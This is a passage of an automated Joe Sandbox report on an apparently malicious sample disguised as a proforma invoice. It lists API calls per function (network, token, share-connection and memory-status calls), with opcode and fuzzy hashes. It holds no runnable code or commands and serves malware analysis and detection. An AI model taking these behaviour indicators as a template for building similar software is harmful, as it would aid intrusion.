                                                                                                                      • Part of subcall function 00255A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,002B7896,?,?,00000000,?,?), ref: 00255A50
                                                                                                                    • _fprintf.LIBCMT ref: 002709E5
                                                                                                                    • OutputDebugStringW.KERNEL32(?), ref: 002A5DBB
                                                                                                                      • Part of subcall function 00274AAA: _flsall.LIBCMT ref: 00274AC3
                                                                                                                    • __setmode.LIBCMT ref: 00270A1A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 521402451-0
                                                                                                                    • Opcode ID: 09dbd2f95b5ef5b6f50ce1d137dee4b5c1ef274c44aacf4ddd41e54f6998d587
                                                                                                                    • Instruction ID: 627df0c6ccf85c6e3d53a9b3a6e16376d316073dc01a23e91f000a38886ef51b
                                                                                                                    • Opcode Fuzzy Hash: 09dbd2f95b5ef5b6f50ce1d137dee4b5c1ef274c44aacf4ddd41e54f6998d587
                                                                                                                    • Instruction Fuzzy Hash: 0C115731924614AFCB04B7B49C8A8FE77AC9F46320F248015F60852182EF7048BA9BA5
                                                                                                                    APIs
                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002C17A3
                                                                                                                      • Part of subcall function 002C182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 002C184C
                                                                                                                      • Part of subcall function 002C182D: InternetCloseHandle.WININET(00000000), ref: 002C18E9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1463438336-0
                                                                                                                    • Opcode ID: 82bc369a4240a0de02e5b341b8025513eacda1a5545e7b65109ea91af60d2043
                                                                                                                    • Instruction ID: 0186acfcca8e63c0c7431f1ebaa0ee65835f0f50513da816b725a3cff2113a33
                                                                                                                    • Opcode Fuzzy Hash: 82bc369a4240a0de02e5b341b8025513eacda1a5545e7b65109ea91af60d2043
                                                                                                                    • Instruction Fuzzy Hash: BC210431224601BFFB168F60DC02FBABBA9FF4A700F10422EF90196551DB71D8309BA0
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNEL32(?,002DFAC0), ref: 002B3A64
                                                                                                                    • GetLastError.KERNEL32 ref: 002B3A73
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 002B3A82
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,002DFAC0), ref: 002B3ADF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2267087916-0
                                                                                                                    • Opcode ID: e2dc9783a62be072d2bcfc1342704c41abae5ffc60b04a5e1f3b5c73eae1d236
                                                                                                                    • Instruction ID: e0ebe6a29b006c788ed62e786af52465a133e963be733d51445fb40395f6298c
                                                                                                                    • Opcode Fuzzy Hash: e2dc9783a62be072d2bcfc1342704c41abae5ffc60b04a5e1f3b5c73eae1d236
                                                                                                                    • Instruction Fuzzy Hash: FD21D6755182028F8300DF28D9858AA77E4BF553A4F244A1EF8DAC72A1D731DE19CB86
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00285101
                                                                                                                      • Part of subcall function 0027571C: __FF_MSGBANNER.LIBCMT ref: 00275733
                                                                                                                      • Part of subcall function 0027571C: __NMSG_WRITE.LIBCMT ref: 0027573A
                                                                                                                      • Part of subcall function 0027571C: RtlAllocateHeap.NTDLL(00C10000,00000000,00000001,00000000,?,?,?,00270DD3,?), ref: 0027575F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 614378929-0
                                                                                                                    • Opcode ID: cd803149e97c64d6c226bcdc71ecf2bb40d3080376589b530fa68f296f10c4d8
                                                                                                                    • Instruction ID: 102817c4b9f48a96ce4766c299d7c3075eb82b01dfeddc5d7eb03961b6a073f9
                                                                                                                    • Opcode Fuzzy Hash: cd803149e97c64d6c226bcdc71ecf2bb40d3080376589b530fa68f296f10c4d8
                                                                                                                    • Instruction Fuzzy Hash: E211A376932A22AECB313F74EC4D75E37989F04361B10952AF90DE61D0DF7489609B94
APIs
• _memset.LIBCMT ref: 002544CF
  • Part of subcall function 0025407C: _memset.LIBCMT ref: 002540FC
  • Part of subcall function 0025407C: _wcscpy.LIBCMT ref: 00254150
  • Part of subcall function 0025407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00254160
• KillTimer.USER32(?,00000001,?,?), ref: 00254524
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00254533
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0028D4B9
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
• Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
• String ID:
• API String ID: 1378193009-0
• Opcode ID: a9d7e0ca169cbe000105acae71b7a5ac8f7542e281f64a19f260590cd827296d
• Instruction ID: d36db5b074e9706a8aa8267b9a90040c82c14a4068879dce4ba5ad092f43fee6
• Opcode Fuzzy Hash: a9d7e0ca169cbe000105acae71b7a5ac8f7542e281f64a19f260590cd827296d
• Instruction Fuzzy Hash: AD213774815384AFE732AF249849BE6FBECAF15309F04008EEB8E561C1C3B0299CCB45
APIs
  • Part of subcall function 00255A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,002B7896,?,?,00000000), ref: 00255A2C
  • Part of subcall function 00255A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,002B7896,?,?,00000000,?,?), ref: 00255A50
• gethostbyname.WSOCK32(?,?,?), ref: 002C6399
• WSAGetLastError.WSOCK32(00000000), ref: 002C63A4
• _memmove.LIBCMT ref: 002C63D1
• inet_ntoa.WSOCK32(?), ref: 002C63DC
Similarity
• API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
• String ID:
• API String ID: 1504782959-0
• Opcode ID: e5c8eb2915ca89da81c61c1fe527fb1b20cb768be8ae3e213192890930da4489
• Instruction ID: 90d681f14ced62a9c63b116adfeac1a2884262d9b5a5d33d79a9723078211535
• Opcode Fuzzy Hash: e5c8eb2915ca89da81c61c1fe527fb1b20cb768be8ae3e213192890930da4489
• Instruction Fuzzy Hash: 28115171920109AFCB04FBA4DD9ADEEB7B8AF04311B144169F906A7161DB309E28DFA5
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 002A8B61
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 002A8B73
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 002A8B89
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 002A8BA4
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: c899876cac3befe7f091f5074c231d3e2521e3ef1601a25702fb7313437f00ae
• Instruction ID: 31d7a6a36e751ae29c5395df524044a6d65d5537799d55931913656c4ee213b7
• Opcode Fuzzy Hash: c899876cac3befe7f091f5074c231d3e2521e3ef1601a25702fb7313437f00ae
• Instruction Fuzzy Hash: 1B114C79901218FFDB10DF95CC84F9DBB78FB48310F204095EA00B7290DA716E11DBA4
APIs
  • Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623
• DefDlgProcW.USER32(?,00000020,?), ref: 002512D8
• GetClientRect.USER32(?,?), ref: 0028B5FB
• GetCursorPos.USER32(?), ref: 0028B605
• ScreenToClient.USER32(?,?), ref: 0028B610
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
• Opcode ID: 0bcc4714e8e556217d26f51423d9efd512f18f5e104047edfcdc1e6338e0ad3c
• Instruction ID: de30b1377cb934adb6719fb827d3133123f8964c2b91a004bf0869d9828e5cd8
• Opcode Fuzzy Hash: 0bcc4714e8e556217d26f51423d9efd512f18f5e104047edfcdc1e6338e0ad3c
• Instruction Fuzzy Hash: 80112B35A21029FFCB00DF94D989AFE77B8EB05305F504456FD11E7240C730AA65CBA9
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 002AD84D
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 002AD864
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 002AD879
• RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 002AD897
Similarity
• API ID: Type$Register$FileLoadModuleNameUser
• String ID:
• API String ID: 1352324309-0
• Opcode ID: 535637006136ab4548900ac167ef370596708978d697eb1b39af219cf7de001c
• Instruction ID: 48301fd9c63bc9aa9754f7dd9b9e465fd237b741598d53fca640d4eacb65a5e7
• Opcode Fuzzy Hash: 535637006136ab4548900ac167ef370596708978d697eb1b39af219cf7de001c
• Instruction Fuzzy Hash: D4116575A16304DFE3208F50ED0CF97BBBCEB01700F108969A657D6850DBF8E9569BA1
APIs
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
• Instruction ID: 3cc8a9135d57e9501539cda496d3f31b0ce98bea7cdfb081032cf98fce94bc72
• Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
• Instruction Fuzzy Hash: E701407A46914EBBCF166F84CC45CED3F66BB28351F688415FE18580B1D236C9B1AF81
APIs
• GetWindowRect.USER32(?,?), ref: 002DB2E4
• ScreenToClient.USER32(?,?), ref: 002DB2FC
• ScreenToClient.USER32(?,?), ref: 002DB320
• InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 002DB33B
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
• Opcode ID: 9da8d4fe0e6b1d003e4520077af05940d5c573d897b390449344206c145ffe3d
• Instruction ID: 53bdd0309523c00b767598f927e12f5fa6730b74a8945754b6cc5e472247ca9c
• Opcode Fuzzy Hash: 9da8d4fe0e6b1d003e4520077af05940d5c573d897b390449344206c145ffe3d
• Instruction Fuzzy Hash: 02117775D00209EFDB41CF99D5449EEBBF9FF08310F108166E915E3620D731AA618F90
APIs
• EnterCriticalSection.KERNEL32(?), ref: 002B6BE6
  • Part of subcall function 002B76C4: _memset.LIBCMT ref: 002B76F9
• _memmove.LIBCMT ref: 002B6C09
• _memset.LIBCMT ref: 002B6C16
• LeaveCriticalSection.KERNEL32(?), ref: 002B6C26
Similarity
• API ID: CriticalSection_memset$EnterLeave_memmove
• String ID:
• API String ID: 48991266-0
• Opcode ID: 5b1e02e9fbec9299fc1e0d0505a8016e0884a2857dd46eb63e8d108cb74cd8c9
• Instruction ID: 48af15637d4b0189b4879c9e7064d012cb1797b98493344fc9c4c18c7d0fbd05
• Opcode Fuzzy Hash: 5b1e02e9fbec9299fc1e0d0505a8016e0884a2857dd46eb63e8d108cb74cd8c9
• Instruction Fuzzy Hash: 8DF0303A500100ABCF416F55EC89A8ABB29EF45360F04C061FE095E226C731E921DFB4
                                                                                                                    APIs
                                                                                                                    • GetSysColor.USER32(00000008), ref: 00252231
                                                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 0025223B
                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 00252250
                                                                                                                    • GetStockObject.GDI32(00000005), ref: 00252258
                                                                                                                    • GetWindowDC.USER32(?,00000000), ref: 0028BE83
                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0028BE90
                                                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0028BEA9
                                                                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0028BEC2
                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 0028BEE2
                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0028BEED
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1946975507-0
                                                                                                                    • Opcode ID: 59c103b9fb587123dbc5514db2f99bbfe63c4f68d3942eeee226000a5ec42813
                                                                                                                    • Instruction ID: 584b0443ed7b09439afac8325106f996c31ca299915b59fe0de9721033fed7eb
                                                                                                                    • Opcode Fuzzy Hash: 59c103b9fb587123dbc5514db2f99bbfe63c4f68d3942eeee226000a5ec42813
                                                                                                                    • Instruction Fuzzy Hash: 9EE03932915245EADF615FA4FD0D7D83B10EB15332F04C36BFA6A880E187718994DB16
                                                                                                                    APIs
                                                                                                                    • GetCurrentThread.KERNEL32 ref: 002A871B
                                                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,002A82E6), ref: 002A8722
                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002A82E6), ref: 002A872F
                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,002A82E6), ref: 002A8736
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3974789173-0
                                                                                                                    • Opcode ID: eb66763343a1fc984fb4ee9aa9a54783b73fac262eab38cc64d3d3d69927c46a
                                                                                                                    • Instruction ID: 355de3964a3584813803212e715b19f1c2f61e04c90990dd4bf8a4f1c438cf10
                                                                                                                    • Opcode Fuzzy Hash: eb66763343a1fc984fb4ee9aa9a54783b73fac262eab38cc64d3d3d69927c46a
                                                                                                                    • Instruction Fuzzy Hash: 13E0863AE162129BD7A05FB07E0CB567BACEF51792F158829B686CA040DA348C51C754
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %.
                                                                                                                    • API String ID: 0-3490990516
                                                                                                                    • Opcode ID: 664390d6b5a2ecabb6d4ae355c579a6e70032639a7c30ea0dd1b4390995a8414
                                                                                                                    • Instruction ID: 0bae63cf25f787e61e89e12d01e9e3f1631add3f332b31d0372477d7afdeac37
                                                                                                                    • Opcode Fuzzy Hash: 664390d6b5a2ecabb6d4ae355c579a6e70032639a7c30ea0dd1b4390995a8414
                                                                                                                    • Instruction Fuzzy Hash: 69B1E77182010A9BCF24EF94C489AFEB7B5FF48312F904066ED01A7191DB749EA9CB59
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __itow_s
                                                                                                                    • String ID: xb1$xb1
                                                                                                                    • API String ID: 3653519197-3895555787
                                                                                                                    • Opcode ID: b4768669c3532c51533516a41f3edd71089986328333023cb1682f40c9282710
                                                                                                                    • Instruction ID: 2ef5e16487d427564c93d8290ad8b6fd9a54bf8d744014471723855f7de3f6d6
                                                                                                                    • Opcode Fuzzy Hash: b4768669c3532c51533516a41f3edd71089986328333023cb1682f40c9282710
                                                                                                                    • Instruction Fuzzy Hash: 35B1BF70A1020AEFCB15DF54C891EBABBB9FF58300F14815DF9499B251EB71D9A4CB60
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0026FC86: _wcscpy.LIBCMT ref: 0026FCA9
                                                                                                                      • Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
                                                                                                                      • Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC
                                                                                                                    • __wcsnicmp.LIBCMT ref: 002BB02D
                                                                                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 002BB0F6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                    • String ID: LPT
                                                                                                                    • API String ID: 3222508074-1350329615
                                                                                                                    • Opcode ID: 51c2ac72832aa29c0d375a6d5f6b6d11308420809d3b87338c0099f92ef95e5f
                                                                                                                    • Instruction ID: da60d29a2c206ebb0c5d62713d94fe297b27855d8c70dff8c5f0a73379eae6f8
                                                                                                                    • Opcode Fuzzy Hash: 51c2ac72832aa29c0d375a6d5f6b6d11308420809d3b87338c0099f92ef95e5f
                                                                                                                    • Instruction Fuzzy Hash: 7A618071A20215EFCB15EF98C895EEEB7B4EB08350F044069F91AAB251D7B0AE94CB54
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00262968
                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00262981
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                                    • Opcode ID: f56d6dcae5093d511ccac19249390bd78754b837cb5ce853443f4f779ee14c4f
                                                                                                                    • Instruction ID: 6d1a229cdbf2626538981bc7324714ceb89537f35c9e6477ed126391b2f7e4d3
                                                                                                                    • Opcode Fuzzy Hash: f56d6dcae5093d511ccac19249390bd78754b837cb5ce853443f4f779ee14c4f
                                                                                                                    • Instruction Fuzzy Hash: 075158724197449BE320EF10D88ABABBBE8FB85351F41885DF6D8410A1DB70857CCB5A
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00254F0B: __fread_nolock.LIBCMT ref: 00254F29
                                                                                                                    • _wcscmp.LIBCMT ref: 002B9824
                                                                                                                    • _wcscmp.LIBCMT ref: 002B9837
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscmp$__fread_nolock
                                                                                                                    • String ID: FILE
                                                                                                                    • API String ID: 4029003684-3121273764
                                                                                                                    • Opcode ID: b646b6a175871ce9e5ae170cea5721ac7106091744a11709030f869591b81d14
                                                                                                                    • Instruction ID: f72559f8bc424a0d3e828d38e95a97772df97093cf20ecc8e0069c18bd465fb6
                                                                                                                    • Opcode Fuzzy Hash: b646b6a175871ce9e5ae170cea5721ac7106091744a11709030f869591b81d14
                                                                                                                    • Instruction Fuzzy Hash: 0F41F831A1020ABADF20AFA4CC49FEFBBBDDF85714F000069FA05B7181DA71A9548B64
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID: Dd1$Dd1
                                                                                                                    • API String ID: 1473721057-713089410
                                                                                                                    • Opcode ID: 40318a5ff009a27113b9e162621d2379eb509b2174a486a9164cae1f5c4e1cbf
                                                                                                                    • Instruction ID: 01d1ee210d303e51befb24258a836765192f1e7aead74522e3d1941ead6dfcd2
                                                                                                                    • Opcode Fuzzy Hash: 40318a5ff009a27113b9e162621d2379eb509b2174a486a9164cae1f5c4e1cbf
